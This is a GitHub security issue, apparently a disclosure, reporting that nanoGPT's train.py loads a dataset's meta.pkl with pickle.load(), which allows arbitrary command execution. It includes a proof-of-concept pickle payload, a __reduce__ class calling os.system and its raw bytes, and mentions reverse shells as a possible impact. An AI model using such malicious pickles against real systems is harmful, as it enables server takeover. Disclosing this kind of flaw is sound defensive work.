[Security] Code Execution via unsafe deserialization

### Summary

An Unsafe Deserialization via *pickle.load()* in nanoGPT allows Remote Command Execution on the server host.

### Details

The vulnerability is caused by the usage of vulnerable function of pickle serialization library ([train.py#L142](https://github.com/karpathy/nanoGPT/blob/3adf61e154c3fe3fca428ad6bc3818b27a3b8291/train.py#L142)).

```python
import pickle
# ...
# attempt to derive vocab_size from the dataset
meta_path = os.path.join(data_dir, 'meta.pkl')
meta_vocab_size = None
if os.path.exists(meta_path):
    with open(meta_path, 'rb') as f:
        meta = pickle.load(f)
    meta_vocab_size = meta['vocab_size']
    print(f"found vocab_size = {meta_vocab_size} (inside {meta_path})")
```

### PoC

For a simple proof of concept we're using the bytes representation of pickled object below:
```python
class Evil:
    def __reduce__(self):
        return (os.system, ("touch pwned",))
```

that is: `\x80\x04\x95+\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94\x8c\x10touch pwned\x94\x85\x94R\x94.`.

Using this payload as content of the file `meta.pkl`, an attacker can execute any arbitrary system command.

### Impact

Usually if attackers can control the dataset they can subvert the model behavior, for example injecting fake outputs in cached queries.
In this case, attackers can run arbitrary system commands without any restriction (e.g. they could use a reverse shell and gain access to the server).  
The impact is high as the attacker can completely takeover the server host.  

### References

- https://docs.python.org/3/library/pickle.html

### Credits

Edoardo Ottavianelli (@edoardottt)


Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

[Security] Code Execution via unsafe deserialization #661

Summary

Details

PoC

Impact

References

Credits

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

[Security] Code Execution via unsafe deserialization #661

Description

Summary

Details

PoC

Impact

References

Credits

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions